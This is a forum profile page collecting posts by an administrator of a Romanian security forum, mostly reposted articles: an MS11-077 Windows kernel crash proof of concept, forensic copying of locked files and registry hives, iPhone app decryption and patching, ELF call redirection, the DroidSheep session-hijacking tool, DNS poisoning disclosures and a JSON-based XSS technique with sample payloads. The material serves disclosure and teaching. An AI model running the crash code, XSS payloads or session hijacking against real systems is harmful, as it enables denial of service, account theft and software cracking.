Jump to content

Nytro

Administrators
 View Profile  See their activity

  • Posts

    18753

  • Joined

  • Last visited

  • Days Won

    726

 Content Type 

Everything posted by Nytro

  1. Nytro
    MS11-077 Win32k Null Pointer De-reference Vulnerability POC # Exploit Code. Only a single line of code can cause BSOD # Exploit Title: MS11-077 Win32k Null Pointer De-reference Vulnerability POC # Date: 10/19/2011 # Author: KiDebug # Version: Windows XP SP3 32bit # Tested on: Windows XP SP3 32bit # CVE : CVE-2011-1985 # Exploit Code. Only a single line of code can cause BSOD: #include <Windows.h> void main() { SendMessageCallback((HWND)-1,CB_ADDSTRING,0,0,0,0); } or: #include <Windows.h> void main() { SendNotifyMessage((HWND)-1,CB_ADDSTRING,0,0); } Those messages can aslo cause BSOD: // CB_ADDSTRING 0x0143 // CB_INSERTSTRING 0x014A // CB_FINDSTRING 0x014C // CB_SELECTSTRING 0x014D // CB_FINDSTRINGEXACT 0x0158 // LB_ADDSTRING 0x0180 // LB_INSERTSTRING 0x0181 // LB_SELECTSTRING 0x018C // LB_FINDSTRING 0x018F // LB_FINDSTRINGEXACT 0x01A2 // LB_INSERTSTRINGUPPER 0x01AA // LB_INSERTSTRINGLOWER 0x01AB // LB_ADDSTRINGUPPER 0x01AC // LB_ADDSTRINGLOWER 0x01AD 0: kd> r eax=0000001b ebx=ee0af1fa ecx=ffffffff edx=bbdd0650 esi=ffffffff edi=ee21fd64 eip=bf914e9b esp=ee21fd08 ebp=ee21fd08 iopl=0 nv up ei pl nz na pe nc cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00010206 win32k!NtUserfnINCBOXSTRING+0x8: bf914e9b 8b4120 mov eax,dword ptr [ecx+20h] ds:0023:0000001f=???????? 0: kd> kp ChildEBP RetAddr ee21fd08 bf80ef2b win32k!NtUserfnINCBOXSTRING+0x8 ee21fd40 8054261c win32k!NtUserMessageCall+0xae ee21fd40 7c92e4f4 nt!KiFastCallEntry+0xfc 0012ff2c 77d194be ntdll!KiFastSystemCallRet 0012ff5c 00401015 USER32!NtUserMessageCall+0xc 0012ff78 0040114c 1!main(void)+0x15 [[r:\temp\1\1.cpp @ 6] 0012ffc0 7c817067 1!__tmainCRTStartup(void)+0x10b [f:\dd\vctools\crt_bld\self_x86\crt\src\crt0.c @ 278] 0012fff0 00000000 kernel32!BaseProcessStart+0x23 Sursa: MS11-077 Win32k Null Pointer De-reference Vulnerability POC
  2. Nytro
    How to acquire "locked" files from a running Windows system By Par Osterberg Medina. Tuesday, October 25, 2011 Windows systems offer a variety of special files that contain important pieces of information that are useful in a forensic investigation. Some obvious examples include the pagefile.sys, event log, registry hives, and NTFS-specific files such as the Master File Table ($MFT). It is a common misconception of many forensic investigators and incident responders that collecting these special files from a live system is cumbersome and impossible to do via the command line. In this blog post I will show a couple different ways to bypass the protection mechanism that Windows holds on these files. Without this hold, it then becomes possible to acquire these files from a running system. You have most likely found yourself in the situation were you wanted to copy a file from a running Windows system, only to be greeted with the infamous "File in Use" dialog box. This is Windows’ way of ensuring that the file is not changed by another process while we are copying it so that we’re not left with a distorted version. For us to succeed with the copy operation we need to communicate directly with the hard drive of the system. This may be accomplished by referring to the volume that the file resides on using Win32 device namespaces, also called "DOS Devices". Win32 Device Namespace By using the "\\.\" prefix we will access the Win32 device namespace (or NamedPipe) instead of the Win32 file namespace to give us direct access to physical disks and volumes without enforcing Windows file protections. In order to illustrate how the process is carried out I will use a tool from Microsoft called ‘nfi’ (NTFS File Sector Information Utility). Identifying Sector Addresses This particular tool is included in the OEM Support Tools for NT 4.0 and Windows 2000 and was originally released June 23, 2000. ‘nfi’ will query the NTFS file system for information regarding a file or a specific sector address in the file system. A sector is the smallest building block on a hard drive and is set by the manufactures of hard drives. One important piece of information that ‘nfi’ gives us is the addresses to the sectors of the file we want to acquire. In the following example, using a 64bit version of Windows 7, we will first create a file (foundstone.txt) and then view its NTFS properties using ‘nfi’: C:\>ver Microsoft Windows [Version 6.1.7601] C:\>FOR /L %i IN (1,1,20) DO @echo data data data data data data >> c:\foundstone.txt C:\>nfi.exe c:\foundstone.txt NTFS File Sector Information Utility. Copyright (C) Microsoft Corporation 1999. All rights reserved. \foundstone.txt $STANDARD_INFORMATION (resident) $FILE_NAME (resident) $FILE_NAME (resident) $DATA (nonresident) logical sectors 7357616-7357623 (0x7044b0-0x7044b7) Notice the last line, this tells us that foundstone.txt is located on logical sectors 7357616-7357623. With this information we can continue to carve out the file from the file system. This is a technique that is commonly referred to as “disk carving” and is used quite extensively in computer forensics. Disk Carving The tool of choice for disk carving is ‘dd’, the “Swiss army knife” of disk based forensics. In this example I will be using the version of ‘dd’ that is included in the Forensic Acquisition Utilities (FAU) written by George M. Garner Jr. First we need specify the Win32 device namespace of our volume as the input file (“if”) and the size of our sectors as the block size (“bs”). We also need to specify where on the volume we want to start carving (“skip”) and how many sectors we want to process (“count”). The option ‘conv=noerror’ tells the program no to stop its operation if it encounter any errors. Below we’ve also piped the output into hexdump so it’s a little easier to read. C:\>dd.exe if=\\.\c: skip=7357616 bs=512 count=8 conv=noerror |hexdump 0000000: 6461 7461 2064 6174 6120 6461 7461 2064 data data data d 0000010: 6174 6120 6461 7461 2064 6174 6120 0a64 ata data data .d 0000020: 6174 6120 6461 7461 2064 6174 6120 6461 ata data data da 0000030: 7461 2064 6174 6120 6461 7461 200a 6461 ta data data .da 0000040: 7461 2064 6174 6120 6461 7461 2064 6174 ta data data dat 0000050: 6120 6461 7461 2064 6174 6120 0a64 6174 a data data .dat 0000060: 6120 6461 7461 2064 6174 6120 6461 7461 a data data data 0000070: 2064 6174 6120 6461 7461 200a 6461 7461 data data .data 0000080: 2064 6174 6120 6461 7461 2064 6174 6120 data data data 0000090: 6461 7461 2064 6174 6120 0a64 6174 6120 data data .data 00000a0: 6461 7461 2064 6174 6120 6461 7461 2064 data data data d 00000b0: 6174 6120 6461 7461 200a 6461 7461 2064 ata data .data d 00000c0: 6174 6120 6461 7461 2064 6174 6120 6461 ata data data da 00000d0: 7461 2064 6174 6120 0a64 6174 6120 6461 ta data .data da 00000e0: 7461 2064 6174 6120 6461 7461 2064 6174 ta data data dat 00000f0: 6120 6461 7461 200a 6461 7461 2064 6174 a data .data dat 0000100: 6120 6461 7461 2064 6174 6120 6461 7461 a data data data 0000110: 2064 6174 6120 0a64 6174 6120 6461 7461 data .data data 0000120: 2064 6174 6120 6461 7461 2064 6174 6120 data data data 0000130: 6461 7461 200a 6461 7461 2064 6174 6120 data .data data 0000140: 6461 7461 2064 6174 6120 6461 7461 2064 data data data d 0000150: 6174 6120 0a64 6174 6120 6461 7461 2064 ata .data data d 0000160: 6174 6120 6461 7461 2064 6174 6120 6461 ata data data da 0000170: 7461 200a 6461 7461 2064 6174 6120 6461 ta .data data da 0000180: 7461 2064 6174 6120 6461 7461 2064 6174 ta data data dat 0000190: 6120 0a64 6174 6120 6461 7461 2064 6174 a .data data dat 00001a0: 6120 6461 7461 2064 6174 6120 6461 7461 a data data data 00001b0: 200a 6461 7461 2064 6174 6120 6461 7461 .data data data 00001c0: 2064 6174 6120 6461 7461 2064 6174 6120 data data data 00001d0: 0a64 6174 6120 6461 7461 2064 6174 6120 .data data data 00001e0: 6461 7461 2064 6174 6120 6461 7461 200a data data data . 00001f0: 6461 7461 2064 6174 6120 6461 7461 2064 data data data d 0000200: 6174 6120 6461 7461 2064 6174 6120 0a64 ata data data .d 0000210: 6174 6120 6461 7461 2064 6174 6120 6461 ata data data da 0000220: 7461 2064 6174 6120 6461 7461 200a 6461 ta data data .da 0000230: 7461 2064 6174 6120 6461 7461 2064 6174 ta data data dat 0000240: 6120 6461 7461 2064 6174 6120 0a64 6174 a data data .dat 0000250: 6120 6461 7461 2064 6174 6120 6461 7461 a data data data 0000260: 2064 6174 6120 6461 7461 200a 0000 0000 data data ..... 0000270: 0000 0000 0000 0000 0000 0000 0000 0000 ................ 0000280: 0000 0000 0000 0000 0000 0000 0000 0000 ................ 0000290: 0000 0000 0000 0000 0000 0000 0000 0000 ................ 00002a0: 0000 0000 0000 0000 0000 0000 0000 0000 ................ 00002b0: 0000 0000 0000 0000 0000 0000 0000 0000 ................ 00002c0: 0000 0000 0000 0000 0000 0000 0000 0000 ................ 00002d0: 0000 0000 0000 0000 0000 0000 0000 0000 ................ 00002e0: 0000 0000 0000 0000 0000 0000 0000 0000 ................ 00002f0: 0000 0000 0000 0000 0000 0000 0000 0000 ................ 0000300: 0000 0000 0000 0000 0000 0000 0000 0000 ................ 0000310: 0000 0000 0000 0000 0000 0000 0000 0000 ................ 0000320: 0000 0000 0000 0000 0000 0000 0000 0000 ................ 0000330: 0000 0000 0000 0000 0000 0000 0000 0000 ................ 0000340: 0000 0000 0000 0000 0000 0000 0000 0000 ................ 0000350: 0000 0000 0000 0000 0000 0000 0000 0000 ................ 0000360: 0000 0000 0000 0000 0000 0000 0000 0000 ................ 0000370: 0000 0000 0000 0000 0000 0000 0000 0000 ................ 0000380: 0000 0000 0000 0000 0000 0000 0000 0000 ................ 0000390: 0000 0000 0000 0000 0000 0000 0000 0000 ................ 00003a0: 0000 0000 0000 0000 0000 0000 0000 0000 ................ 00003b0: 0000 0000 0000 0000 0000 0000 0000 0000 ................ 00003c0: 0000 0000 0000 0000 0000 0000 0000 0000 ................ 00003d0: 0000 0000 0000 0000 0000 0000 0000 0000 ................ 00003e0: 0000 0000 0000 0000 0000 0000 7275 653b ............rue; 00003f0: 7d3b 7362 5f67 683d 6675 6e63 7469 6f6e };sb_gh=function 0000400: 2829 7b72 6574 7572 6e20 6c6f 6361 7469 (){return locati 0000410: 6f6e 2e68 6173 687d 3b73 625f 7368 3d66 on.hash};sb_sh=f 0000420: 756e 6374 696f 6e28 6129 7b6c 6f63 6174 unction(a){locat 0000430: 696f 6e2e 6861 7368 3d61 7d3b 5f77 3d77 ion.hash=a};_w=w 0000440: 696e 646f 773b 5f64 3d64 6f63 756d 656e indow;_d=documen 0000450: 743b 7362 5f64 653d 5f64 2e64 6f63 756d t;sb_de=_d.docum 0000460: 656e 7445 6c65 6d65 6e74 3b73 625f 6965 entElement;sb_ie 0000470: 3d21 215f 772e 4163 7469 7665 584f 626a =!!_w.ActiveXObj As you can see, there is data being printed to stdout even after the data in our file has ended. The reason for this is because a file occupies sectors grouped together on an even boundary. This grouping of sectors is called a cluster and the data that we see after the end of the file is referred to as slack space, remnants of old files that used to occupy the same sectors that now are part of the clusters for our file. As a side note and interesting detail from a forensics stand point is that no time stamps are modified. Using icat and ifind Now that we know the basics of what is needed to acquire a file using the Win32 device namespace, let’s take a look at using a more automated method for doing so. Another way to get files of the system (not worrying about slack space at the end of the file and with no need for manual calculation of where the clusters start and end) is to use the utilities ‘ifind’ and ‘icat’ from Brian Carriers’ the Sleuthkit.The Sleuthkit, in my opinion, is the best and most flexible forensic toolkit available – and it’s open source. By specifying the drive letter and the path to the file, ‘icat’ will return the entry number the file has in the $MFT. While this number is referred to as an $MFT entry on NTFS, it’s called an inode in UNIX based file systems. In order for ‘ifind’ to work properly the full path to must be given using UNIX style path (forward slash instead of back slash and with no drive letter in the beginning of the path). In this example we will acquire the security registry hive from the running system, a file that is normally not accessible. C:\>ifind.exe -V The Sleuth Kit ver 3.2.3 C:\>ifind.exe -n /windows/system32/config/security \\.\c: 27392 By using the files number in the $MFT as an argument to ‘icat’ we can easily carve out the file from the file system. The ‘icat’ program will take care of terminating the output where the file ends but we need to redirect the output from stdout to wherever we want to store the file. C:\>icat.exe \\.\c: 27392 > c:\security.bin C:\> file.exe security.bin security.bin; MS Windows registry file, NT/2000 or above Now that we know how to bypass Windows file protection the only thing that remains is to automate the procedure so that we can include the “locked” files in our live data acquisition phase. I was going to post my wrapper script to ‘ifind’ and ‘icat’ but when I did some researching on the Internet I found a much better tool called ‘ntfscopy’. ntfscopy The tool is written by Jonathan Tomczak from TZWorks LLC and does exactly what we have discussed above plus more. You can download it from http://tzworks.net. Here are the options that ‘ntfscopy’ supports; usage: copying by filename ntfscopy.exe = live system ntfscopy.exe -image [-offset ] other options that can be used w/ the above -raw = output raw clusters including slack space -meta = pull out metadata into separate file [.meta.txt] -skip_sparse_clusters = don't include sparse clusters in the output -md5 = prepends last mod time to filename and appends md5 hash experimental options a. copying by logical cluster number (LCN) ntfscopy.exe -partition -cluster ntfscopy.exe -image [-offset ] -cluster b. copying from a VMWare virtual NTFS drive (limited) ntfscopy.exe -vmdk [-vmdk ] c. piping in which files to copy dir \* /b /s | ntfscopy.exe -pipe -md5 Here is an example of using ‘ntfscopy’ to acquire a copy of the $MFT from a live Windows system. C:\>ntfscopy.exe c:\$MFT c:\copy_of_MFT ntfscopy ver: 0.65, Copyright (c) TZWorks LLC copy successful Forensic Get Another tool that will get the job done is FGET or Forensic Get from HBGary, Inc. The program can not only acquire “locked” files from a local file system, but does also support over the network operations. FGET and other free tools from HBGary can be downloaded from http://hbgary.com/free-tools. Below is an example of me using FGET to acquire a copy of the $Mft. C:\>FGET.exe -extract c:\$Mft c:\copy_of_Mft2.bin -= FGET v1.0 - Forensic Data Acquisition Utility - (c)HBGary, Inc 2010 =- [+] Extracting File From Volume ...SUCCESS! By including 'ntfscopy' or any of the other methods described above, forensic examiners and incident responders can now acquire protected files through a command line interface. Examples of how we can put everything together and automate it will be explained in part II of this blog post. Bio Par Osterberg Medina has worked with computer security for over 15 years, with a background in both system administration and penetration testing. Prior to joining Foundstone, Par spent the last 8 years working as an Incident Handler for the Swedish GovCERT, investigating computer intrusions and coordinating security related incidents. He specializes in Malware Analysis and Memory Forensics, finding Rootkits that tries to stay hidden in the Operating System. He has conducted training and lectured on this subject all over the world at conferences such as FIRST and The GOVCERT.NL Symposium. Sursa: http://blog.opensecurityresearch.com/2011/10/how-to-acquire-locked-files-from.html
  3. Nytro
    Decrypting iPhone Apps saurabh @ 13:57 This blog post steps through how to convert encrypted iPhone application bundles into plaintext application bundles that are easier to analyse. Requirements: 1) Jailbroken iPhone with OpenSSH, gdb plus other utilities (com.ericasadun.utilities etc. etc.) 2) An iPhone app 3) On your machine: otool (comes with iPhone SDK) Hex editor (0xED, HexWorkshop etc.) Ida - Version 5.2 through 5.6 supports remote debugging of iPhone applications (iphone_server). For this article, I will use the app name as "blah". Some groundwork, taken from Apple's API docs [1, 2]: The iPhone apps are based on Mach-O (Mach Object) file format. The image below illustrates the file format at high-level: A Mach-O file contains three major regions: 1. At the beginning of every Mach-O file is a header structure that identifies the file as a Mach-O file. The header also contains other basic file type information, indicates the target architecture, and contains flags specifying options that affect the interpretation of the rest of the file. 2. Directly following the header are a series of variable-size load commands that specify the layout and linkage characteristics of the file. Among other information, the load commands can specify: The initial layout of the file in virtual memory The location of the symbol table (used for dynamic linking) The initial execution state of the main thread of the program The names of shared libraries that contain definitions for the main executable's imported symbols 3. Following the load commands, all Mach-O files contain the data of one or more segments. Each segment contains zero or more sections. Each section of a segment contains code or data of some particular type. Each segment defines a region of virtual memory that the dynamic linker maps into the address space of the process. The exact number and layout of segments and sections is specified by the load commands and the file type. 4. In user-level fully linked Mach-O files, the last segment is the link edit segment. This segment contains the tables of link edit information, such as the symbol table, string table, and so forth, used by the dynamic loader to link an executable file or Mach-O bundle to its dependent libraries. The iPhone apps are normally encrypted and are decrypted by the iPhone loader at run time. One of the load commands is responsible for decrypting the executable. Push EBP Mov EBP, ESP JMP loc_6969 loc_6969: Once you have downloaded and installed an app on your iPhone, make a copy of the actual executable on your machine. Note1: The blah.app is not the actual executable. If you browse this folder, you will find a binary file named blah. This is the actual application binary. Note2: To find the path where your application is installed, ssh onto your iPhone and use the following command: sudo find / | grep blap.app Once you have copied the app binary on your machine, follow the steps below (on your local machine). Open up a terminal and type the following command: otool —l blah | grep crypt This assumes that iPhone SDK or otool is already installed on your machine. The above command will produce the following output: If cryptid is set to 1, it implies that the app is encrypted. cryptoff and cryptsize indicates the offset and size of crypt section respectively. Now, firstly we'll have to locate the cryptid in the binary and set it to zero. This is done so that when we finally decrypt the binary and execute it on iPhone, the loader does not attempt to decrypt it again. Open the binary in a hex editor and load the binary. I did not come across any definite method of locating the cryptid. Once you have loaded the binary in a hex editor, search for “/System/Library/Frameworks”. You should be able to locate it around the address 0x1000. In the line, just above the very first instance of this statement (/System/Library/Frameworks), you will find bytes 01. Flip it to 00 and save the file. Note3: In case you find multiple instances of 01, use coin-tossing method of choosing between them. Use otool again to query the crypt data. You will see that the cryptid is now set to 0 (zero). Next, we need to run the app, which was installed on iPhone and take a memory dump. Note4: The actual application code starts at 0x2000. The cryptsize in case of our sample app is 942080 (0xE6000). Hence, we add 0x2000 and 0xE6000. 0x2000 + 0xE6000 = 0xE8000 Therefore, we need to dump the running process from 0x2000 till 0xE8000. Now, ssh onto your iPhone, run the target app and look for the process id using “ps —ax” command. Once you have the process id, use the following command to dump the process: gdb —p PID dump memory blah.bin 0x2000 0xE8000 Once you have taken the memory dump, use “quit” command to exit gdb. Use the following command to get the size of memory dump: ls —l blah.bin The size of this bin file should exactly be same as the cryptsize of the original app. Refer to screenshot above. Now pull this bin file onto your local machine. On your local machine, load the bin file in a hex editor and copy everything (using select all or whatever). Close the file and open the original app in the hex editor. (The file in which we modified cryptid 01 to 00). If you remember, the cryptoff was 4096, which is 0x1000 (in hex). Proceed to memory address 0x1000 and make sure that your hex editor is in overwrite mode, not in append mode. Once you are on memory address 0x1000, paste everything you copied from the bin file. This will overwrite the encrypted section with the decrypted one. Save the file and you're done. Open the file in IDA pro and you'll see the difference between the encrypted and decrypted binaries. At this point, you can easily reverse engineer the app and patch it. The first image below shows an encrypted app and the second one illustrates a decrypted app: After patching the application, ssh onto the iPhone and upload it to the application directory. This would mean replace the original binary with the patched one. Once uploaded, install a utility called "ldid" on your iphone. apt-get install ldid Finally, sign the patched binary using ldid: ldid -s blah This will fix the code signatures and you will be able to run the patched app on your iPhone. References: 1) http://developer.apple.com/library/mac/#documentation/DeveloperTools/Conceptual/MachORuntime/Reference/reference.html 2) http://developer.apple.com/library/mac/#documentation/Darwin/Reference/ManPages/man1/otool.1.html Sursa: http://www.sensepost.com/blog/6254.html
  4. Nytro

    DaLy DLL Injector

    Nytro replied to a topic in Programe utile

    Prin ce metoda se injecteaza, CreateRemoteThread?
  5. Nytro

    Ce nesimtire

    Nytro replied to Petzy's topic in Off-topic

    Ca ateu, nu am nimic cu ratatii care vin sa pupe oase, dar am ceva cu BOR-ul (Biserica Ortodoxa Romana) si cu magariile financiare pe care le fac.
  6. Nytro
    Sunt diferente: - versiunea de kernel si driverele pentru placile de retea suportate - patch-urile pentru drivere ca sa suporte packet injection (sau cum se cheama) - versiunile de airmon/aircrack... pe langa celelalte utilitare Deci, cel putin in teorie, 5 ar trebui sa aiba multe plusuri fata de 3. PS: Aceste diferente nu prea sunt "vizibile" de obicei, poate doar sa folosesti --channel in loc de -c.
  7. Nytro
    Redirecting functions in shared ELF libraries By Apriorit Inc, Anthony Shoumikhin | 2 Apr 2010 | Unedited contribution This article gives brief description of ELF libs structure and functioning and also shows how to intercept function calls from one library into another TABLE OF CONTENTS 1. The problem 1.1 What does redirecting mean? 1.2 Why redirecting? 2. Brief ELF explanation 2.1 Which parts does ELF file consist of? 2.2 How do shared ELF libraries link? 2.3 Some useful conclusions 3. The solution 3.1 What is the algorithm of redirection? 3.2 How to get the address, which a library has been loaded to? 3.3 How to write and restore a new function address? 4. Instead of conclusion 5. Useful links 1. The problem We all use Dynamic Link Libraries (DLL). They have excellent facilities. First, such library loads into the physical address space only once for all processes. Secondly, you can expand the functionality of the program by loading the additional library, which will provide this functionality. And that is without restarting the program. Also a problem of updating is solved. It is possible to define the standard interface for the DLL and to influence the functionality and the quality of the basic program by changing the version of the library. Such methods of the code reusability were called "plug-in architecture". But let's move on. Of course, not every dynamic link library relies only on itself in its implementation, namely, on the computational power of the processor and the memory. Libraries use libraries or just standard libraries. For example, programs in the C\C++ language use standard C\C++ libraries. The latter, besides, are also organized into the dynamic link form (libc.so and libstdc++.so). They are stored in the files of the specific format. My research was held for Linux OS where the main format of dynamic link libraries is ELF (Executable and Linkable Format). Recently I faced the necessity of intercepting function calls from one library into another - just to process them in such a way. This is called the call redirecting. 1.1 What does redirecting mean? First, let’s formulate the problem on the concrete example. Supposing we have a program called "test" on the C language (test.c file) and two split libraries (libtest1.c and libtest2.c files) with permanent contents and which were compiled beforehand. These libraries provide functions: libtest1() and libtest2(), respectively. In their implementation each of them uses the puts() function from the standard library of the C language. A task consists in the following: To replace the call of the puts() function for both libraries by the call of the redirected puts() function. The latter is implemented in the master program (test.c file) that can in its turn use the original puts() function; To cancel the performed changes, that is to make so that the repeated call of libtest1() and libtest2() leads to the call of the original puts() function. It is not allowed to change the code or recompile the libraries. We can change only the master program. Articol complet: http://www.codeproject.com/KB/library/elf-redirect.aspx
  8. Nytro
    Howto Use Droidsheep - Tutorial Description: This official tutorial for DroidSheep for Android shows how to use DroidSheep to capture sessions in your local network. DroidSheep runs on your Android device and listens to the networks traffic. If it captures a cookie, it shows a list with the cookies and the user can simply use the victims account without knowing his user credentials. Download droidsheep: Droidsheep - Insecure Stuff If u have any problem then contact me on twitter: Twitter Video: http://www.securitytube.net/video/2374
  9. Nytro
    Super, inseamna ca nu e problema daca ti-am sters ultimele cifre (referral) din link nu?
  10. Nytro
    Cred ca acum e --channel in loc de -c. In acel fisier se salveaza pachetele (nu intregi) necesare pentru spargerea parolei. Nici eu nu stiu prea multe in acest domeniu, pune un nume de fisier, pe care sa il tii minte, il vei folosi cu aircrack.
  11. Nytro
    DNS poisoning via Port Exhaustion Today we are releasing a very interesting whitepaper which describes a DNS poisoning attack against stub resolvers. It discloses two vulnerabilities: A vulnerability in Java (CVE-2011-3552, CVE-2010-4448) which enables remote DNS poisoning using Java applets. This vulnerability can be triggered when opening a malicious webpage. A successful exploitation of this vulnerability may lead to disclosure and manipulation of cookies and web pages, disclosure of NTLM credentials and clipboard data of the logged-on user, and even firewall bypass. A vulnerability in multiuser Windows environments which enables local DNS cache poisoning of arbitrary domains. This vulnerability can be triggered by a normal user (i.e. one with non-administrative rights) in order to attack other users of the system. A successful exploitation of this vulnerability may lead to information disclosure, privilege escalation, universal XSS and more. The whitepaper can be found here. http://blog.watchfire.com/files/dnsp_port_exhaustion.pdf A few video demos of our Proof-of-Concept: Attack: Remote DNS poisoning via Java Applets: Cookie theft. Environment: Ubuntu 11.04, Firefox 7.0.1. http://www.youtube.com/watch?v=eSEvFmsw55A Attack: Remote DNS poisoning via Java Apples: NTLM credentials and Clipboard theft. Environment: Windows 2008, Internet Explorer 9. http://www.youtube.com/watch?v=i-Fmk7-pFFA Attack: Remote DNS poisoning via Java Applets: Firewall bypass. Environment: Windows 2008, Firefox 7.0.1. http://www.youtube.com/watch?v=7CFq_pofeBU Attack: Local DNS poisoning via port exhaustion. Environment: Windows 2008. http://www.youtube.com/watch?v=m2GkLL9d68E We would like to thank Oracle and Microsoft for their cooperation. -Roee Hay and Yair Amit Sursa: IBM Rational Application Security Insider: DNS poisoning via Port Exhaustion
  12. Nytro
    JSON-based XSS exploitation October 24, 2011 JSON rendering in Internet Explorer In the world of Web2.0 and mash web applications, security researchers come across more and more XSS vulnerabilities that are reflected in non HTML responses. For example, JSON responses are becoming more and more common, but exploiting XSS vectors in those pages is considered theoretical because browsers pop up the file download dialog instead of rendering the response when the returned content-type is application/json or application/javascript. There are a few known methods to indirectly exploit these issues: 1. Attacking the JSON parsing mechanism: Some applications use JS evaluation functions in order to create an object from the returned JSON content. If the attacker is able to inject, for example, a quote sign, he can break out of the JS string surrounding the value and exploit the XSS through the eval function. For example: "name":"Foo "+alert(/XSS/.source)+"Bar" 2. Waiting for document.write: Some applications will write parts of the data returned in the JSON response to the DOM. An attacker can inject HTML content into the JSON response that will be rendered once the application writes it to the page. For example: "name":"Foo <img src=x onerror=alert(/XSS/.source)>Bar" Although the previous methods will work, they have a few limitations: Not all applications have the logical flow needed in order to exploit these attacks. Some applications use client side filtering that will prevent them from running. After thorough research on alternative ways to exploit these types of vulnerabilities, we have discovered a way to render JSON responses in IE by direct browsing. The way IE decides what content-type will be used for a specific response is as follows: (As discovered by Black-Box research) The suggested (server supplied) content-type is searched for in the windows registry for the corresponding CLSID, in order to find the correct handler for that response. If the suggested content-type is found, IE will consider that to be the final content-type. If the suggested content-type however is not found, IE will attempt to figure out the content-type based on the file extension and other vectors. JSON responses generally use the content-type application/json, the problem is that the default mime type list of Internet Explorer does not include that mime-type, in fact it does not include any JSON mime type whatsoever. Example scenario while browsing to a link which returns JSON content: User browses to http://attacker.com/json.php Internet Explorer searches the windows registry (HKCR\MIME\Database\Content Type\) for the returned content-type (application/json). – Not found. Internet Explorer searches the windows registry (HKCU\Software\Classes\) for the file extension (.php) – Not found. Internet Explorer prompts the file download dialog. From this scenario we can conclude that in cases where the server returns content-types that are unknown to Internet Explorer, the file extension (in addition to other factors not covered here) dictates the final content-type that will be used. In order to force IE to render JSON responses, the file extension in the URL must be set to something that IE consider as text/html (.htm or .html). The way most web servers parse the path from a request is this: The user requests the page http://site.com/html/pages/page.php?id=1 The server starts to search for the requested resource at the pre-defined path of the web server (for example /var/www/) The server searches for the path requested by the user one entity at a time (starting from left). The server finds that /html/pages/page.php is an executable file and stops the search (executable means that the server has some handler that correlates to that file type; in this case the PHP engine). The rest of the path (id=1) is then passed as a parameter (GET) to PHP. Most server side languages (.Net, PHP, Python, Perl…) accept another type of parameter to be passed from the URL: Path-Info. Unlike the GET parameter, in which the delimiter value is the question mark sign (?), path-info uses the slash sign (/) as its delimiter. For example the previous path for page.php can be expanded into having a path-info: http://site.com/html/pages/page.php/user=2?id=1 [scheme]://[domain][path]/[path-info]?[get-query] Once an attacker combines path-info with IE's way of considering content-type values, a wide method of exploiting JSON responses for XSS is achievable. Consider the following scenario: The attacker found a reflected XSS in a web application. When browsing to "http://site.com/page.php?user=bla<img onerror=alert(1) src=x>bla" Internet Explorer pops up the file download dialog (explained in the beginning of this document). The attacker now adds the value ".html" as a path-info to the URL The attacker now browses to: http://site.com/page.php/.html?user=blah<img onerror=alert(1) src=x>blah The server returns the same page (containing XSS) with same content-type (application/json) Internet Explorer searches the windows registry for the application/json content-type and cannot find it. This is the point where Internet Explorer uses the file extension of the URL to determine the content-type of the response, only this time the extension IE sees is .html! Internet Explorer finds the matching content-type for .html files to be text/html, renders the response and fires up the XSS. Impact: Client side, tested successfully on: • Internet Explorer 6 • Internet Explorer 7 • Internet Explorer 8 • Internet Explorer 9 Server side, tested successfully on: • IIS 5.1 (ASPX , PHP) • IIS 6 (ASPX , PHP) • IIS 7.5 (ASPX , PHP) • Apache/2.2.14 (PHP) Remediation: Client side: • The following registry key will add the content-type application/json and a corresponding CLSID [HKEY_CLASSES_ROOT\MIME\Database\Content Type\application/json] "CLSID"="{3050f4d8-98B5-11CF-BB82-00AA00BDCE0B}" Server side: • In order to remediate this issue in the server side, beyond the normally recommended sanitization of user supplied inputs, we recommend turning off support of Path-Info. Sursa: http://blog.watchfire.com/wfblog/2011/10/json-based-xss-exploitation.html
  13. Nytro
    De la serverele la care au obtinut acces. De obicei au un motiv pentru fiecare actiune si de obicei obtin acces total: root.
  14. Nytro
    ASLR Added to Android 4.0 by Dennis Fisher October 24, 2011, 8:36AM The newest version of the Android mobile operating system includes a major security upgrade, the presence of address space layout randomization (ASLR), which gives users some better protection against memory-corruption exploits. The inclusion of ASLR in Android 4.0, also known as "Ice Cream Sandwich", brings the security model of the operating system up a notch in relation to previous versions. Security researchers have criticized Android for its security shortcomings and have said that the security model offered by Apple's iOS is more beneficial for users. The iPhone operating system has included ASLR and data execution protection (DEP) for some time now, and iOS also includes a sandbox to help prevent attackers from moving among various applications once they've compromised a device. ASLR is designed to help prevent certain kinds of attacks by making it more difficult for attackers to know which components will be in which memory locations. The technology randomly arranges the positions of various components of a process, which makes it harder to attacks such as buffer overflows and other memory-corruption techniques to succeed. Both ASLR and DEP have been key technologies in desktop operating systems such as Windows Vista and Windows 7 to help prevent common attack techniques. In addition to the inclusion of ASLR, Android 4.0 also has improved management of user credentials. "Android 4.0 makes it easier for applications to manage authentication and secure sessions. A new keychain API and underlying encrypted storage let applications store and retrieve private keys and their corresponding certificate chains. Any application can use the keychain API to install and store user certificates and CAs securely," the Android 4.0 developer notes say. The new mobile OS also includes an enhanced API for VPNs. "Developers can now build or extend their own VPN solutions on the platform using a new VPN API and underlying secure credential storage. With user permission, applications can configure addresses and routing rules, process outgoing and incoming packets, and establish secure tunnels to a remote server. Enterprises can also take advantage of a standard VPN client built into the platform that provides access to L2TP and IPSec protocols," the notes say. Sursa: ASLR Added to Android 4.0 | threatpost
  15. Nytro
  16. Nytro
    Da, sunt comunist cand vine vorba de astfel de rahaturi. Nu am comentat nimic la topicuri tehnice, nu am inchis niciunul, nu am dat niciun ban acolo. Dau ban aici, celor ca tine, care nu au ce cauta aici, care spera sa vanda bilete la pariuri si nu sa lucreze in IT.
  17. Nytro
    M-am saturat de discutii despre pariuri, Serban Huidu, recesamant sau alte porcarii. RST nu e locul potrivit pentru asa ceva, nici chiar la offtopic. Desigur, daca e sa ma uit la posturile tale ai doar un post "interesant" la Tutoriale romana: te caci pe el tutorial. inca sunt socat ca ai pus virus scan la un fisier html ))) unul la Prezentari si restul sunt aici, la Offtopic. Practic, conform legilor lui Nytro, esti in plus aici (deocamdata). PS: Se vor limita acest gen de discutii. Daca nu va convine, exista OTV.
  18. Nytro
